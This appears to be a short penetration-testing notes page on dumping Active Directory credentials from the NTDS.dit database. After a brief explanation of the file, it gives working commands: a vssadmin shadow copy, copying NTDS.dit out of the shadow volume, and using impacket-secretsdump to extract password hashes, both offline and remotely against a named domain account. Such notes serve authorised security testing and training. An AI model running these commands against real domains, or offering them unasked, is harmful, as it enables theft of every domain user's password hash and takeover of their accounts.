Domain-joined Windows systems send logon requests to Domain Controllers (DC) in the same Active Directory forest. Each Domain Controller hosts an NTDS.dit file, which is synchronized across all DCs except Read-Only Domain Controllers. It’s typically stored at %SystemRoot%\ntds.dit.

This database file stores Active Directory data including:

User accounts (username & password hash)
Group accounts
Computer accounts
Group policy objects

NTDS.dit Dump File

The NT Directory Services (NTDS) is the directory service used with AD to find & organize network resources. The .dit stands for directory information tree. This is the primary database file associated with AD and stores all domain usernames, password hashes, and other critical schema information.

# Creating shadow copy of C:
vssadmin CREATE SHADOW /For=C:
 
# Copying NTDS.dit from the VSS
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\NTDS.dit

Required HKLM\SYSTEM for decrypting the NTDS.dit.

# Dumping using impacket - secretsdump
impacket-secretsdump -ntds NTDS.dit -system system.save LOCAL

Remote Dumping

It is possible to dump credentials over the network. This allows us to extract credentials remotely.

# Dumping using impacket - secretsdump
impacket-secretsdump ILF.local/jmarston@$IP

☠️ ζHUB

Explorer

NTDS

NTDS.dit Dump File

Remote Dumping

Explorer

Table of Contents

Backlinks